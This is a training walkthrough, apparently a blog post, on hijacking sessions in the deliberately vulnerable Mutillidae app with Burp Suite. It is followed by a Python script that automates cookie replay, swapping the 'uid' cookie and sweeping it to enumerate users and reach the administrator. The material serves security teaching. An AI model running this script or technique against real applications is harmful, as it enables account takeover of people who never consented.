This is a list of steps for performing a cookie-based session hijacking attack against a logged-in user of a web application. It uses the wonderful Mutillidae (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) deliberately vulnerable web application as the victim server, Burp Suite (free or pro, https://portswigger.net/burp/download.html) as the intercepting proxy, and a web browser (in this case I've chosen Firefox).
This post presupposes that you already have Mutillidae, Burp and Firefox installed and running. If not, please refer to those sites for details on how to get there.
- Set up Firefox to use Burp
- Edit the Network settings inside the Advanced section of Firefox's settings area to point the browser at Burp's local proxy. Burp's proxy listener defaults to 127.0.0.1 on TCP port 8080, so use localhost for the host/IP and 8080 for the port.
- Launch Burp and confirm that browser traffic shows up in the Proxy tab's HTTP history. If it does not, troubleshoot that before moving on.
- In the Mutillidae application, visit the http://YourIPHere/index.php?page=login.php page.
- Click the Please register here link at the bottom of the page and register 2 different users. One will be the account you log in with; the other is the victim whose identity you will try to assume.
- Go to the login.php page (http://YourIPHere/index.php?page=login.php) in your browser and log in to the application using one of the user accounts.
- Go to Burp and find the server's response to the successful login in the Proxy history. It should carry 2 Set-Cookie headers, i.e. 2 new cookies that were set in your browser. Note their names and values.
- Go to the Mutillidae app in the browser and browse to another page.
- Send that new request from the Burp Proxy to Burp Repeater and ensure that both application cookies are present in the Cookie header of the request.
- Press the GO button in the Repeater function to send an unmodified request to the server.
- In the response pane you should see that the user is logged in (visible in the response headers as well as in the HTML body).
- Now, in Burp Repeater, alter each of the cookies the application set (for example, substitute the values that belong to the other user you registered) and resubmit the request. Watch whether the username in the response changes. If swapping a cookie value alone changes who the application thinks you are, the application is trusting a client-controlled identifier instead of a server-side session, which is exactly what makes the hijack possible.
Next Steps could be…
- Copy the cookie values out of Burp and set them in the browser (via Firefox's developer tools Storage panel or a cookie editor add-on) to become the other user and browse around the application as them.
- Use Burp Intruder to fuzz the cookie value and find other users you could become. Keep in mind who the first user of the application is likely to be: with a sequential numeric identifier, the lowest value usually belongs to the first account created, which is often the administrator.
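The same procedure as a script, added here as an example; it is not code from the original post, from Mutillidae or from Burp. It uses only the Python standard library and walks through steps 9 to 18: log in, read the Set-Cookie headers off the raw response, replay a request with the cookies, swap one cookie value, then sweep a range of values the way Intruder would. Everything about the target is an assumption that you should confirm against what you actually see in Burp: the login form field names (username, password, login-php-submit-button), the probe page, the name of the numeric user-id cookie (uid), and the "Logged In User:" text used to read the identity out of the HTML. A constructed, offline stand-in for the server is included so the logic runs without a Mutillidae instance; pass a host on the command line to run it against the real one.

```python
"""Added example (not from the original post, Mutillidae or Burp).

Automates steps 9-18: log in, parse Set-Cookie (step 10), replay with the
cookies (12-14), alter one cookie (15), sweep a range of values (18).
ASSUMPTIONS, all unconfirmed by the post: login form fields
username/password/login-php-submit-button posted to /index.php?page=login.php,
a numeric user-id cookie named "uid", and the page showing the current user
as "Logged In User: <name>". Adjust the constants after inspecting Burp.
"""
import http.client
import http.cookies
import re
import urllib.parse

LOGIN_PATH = "/index.php?page=login.php"                 # assumption
PROBE_PATH = "/index.php?page=home.php"                  # any page echoing the user
USER_RE = re.compile(r"Logged In User:\s*(?:<[^>]*>\s*)*([^<\s]+)")  # assumption


def http_fetch(host, method, path, headers=None, body=None):
    """One raw HTTP exchange. Redirects are deliberately not followed so the
    Set-Cookie headers on a post-login 302 stay visible, as they do in Burp."""
    conn = http.client.HTTPConnection(host, timeout=10)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.getheaders(), resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


def parse_set_cookies(headers):
    """Step 10: collect name -> value from every Set-Cookie header."""
    jar = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            c = http.cookies.SimpleCookie()
            c.load(value)
            jar.update({k: m.value for k, m in c.items()})
    return jar


def cookie_header(jar):
    """Step 12: serialise the jar back into a Cookie request header."""
    return "; ".join(f"{k}={v}" for k, v in jar.items())


def with_cookie(jar, name, value):
    """Step 15: copy of the jar with one cookie replaced."""
    new = dict(jar)
    new[name] = str(value)
    return new


def logged_in_user(html):
    """Step 14: who does the page say we are? None if nobody."""
    m = USER_RE.search(html)
    return m.group(1) if m else None


def login(fetch, host, username, password):
    body = urllib.parse.urlencode({"username": username, "password": password,
                                   "login-php-submit-button": "Login"})
    _, headers, _ = fetch(host, "POST", LOGIN_PATH,
                          {"Content-Type": "application/x-www-form-urlencoded"}, body)
    return parse_set_cookies(headers)


def whoami(fetch, host, jar):
    """Replay a GET with the given cookies and report the resulting identity."""
    _, _, body = fetch(host, "GET", PROBE_PATH, {"Cookie": cookie_header(jar)})
    return logged_in_user(body)


def enumerate_users(fetch, host, jar, cookie_name, candidates):
    """Step 18: try each candidate value for one cookie; keep the hits."""
    hits = {}
    for cand in candidates:
        user = whoami(fetch, host, with_cookie(jar, cookie_name, cand))
        if user:
            hits[str(cand)] = user
    return hits


# Constructed offline stand-in for the vulnerable server: identity is whatever
# the "uid" cookie says, which is the flaw the walkthrough is looking for.
_SIM_USERS = {"1": "admin", "24": "alice", "25": "bob"}   # constructed data


def simulated_fetch(host, method, path, headers=None, body=None):
    if method == "POST":
        return 302, [("Set-Cookie", "username=alice; path=/"),
                     ("Set-Cookie", "uid=24; path=/")], ""
    sent = dict(p.strip().split("=", 1)
                for p in (headers or {}).get("Cookie", "").split(";") if "=" in p)
    user = _SIM_USERS.get(sent.get("uid"))
    return 200, [], (f"<b>Logged In User:</b> <i>{user}</i>" if user
                     else "<b>Not Logged In</b>")


if __name__ == "__main__":
    import sys
    fetch, host = ((http_fetch, sys.argv[1]) if len(sys.argv) > 1
                   else (simulated_fetch, "sim"))
    jar = login(fetch, host, "alice", "alice")            # one of the step-8 accounts
    print("cookies set at login:", jar)
    print("replayed as:", whoami(fetch, host, jar))
    print("uid forced to 1:", whoami(fetch, host, with_cookie(jar, "uid", 1)))
    print("uid sweep 1-30:", enumerate_users(fetch, host, jar, "uid", range(1, 31)))
```

The transport is passed in as a function so the same logic runs against the simulator or a live host; when you point it at a real Mutillidae, the first thing to verify is that `parse_set_cookies` returns the same two cookies you saw in step 10, and that `logged_in_user` actually finds the name in the HTML, since both depend on the assumptions above.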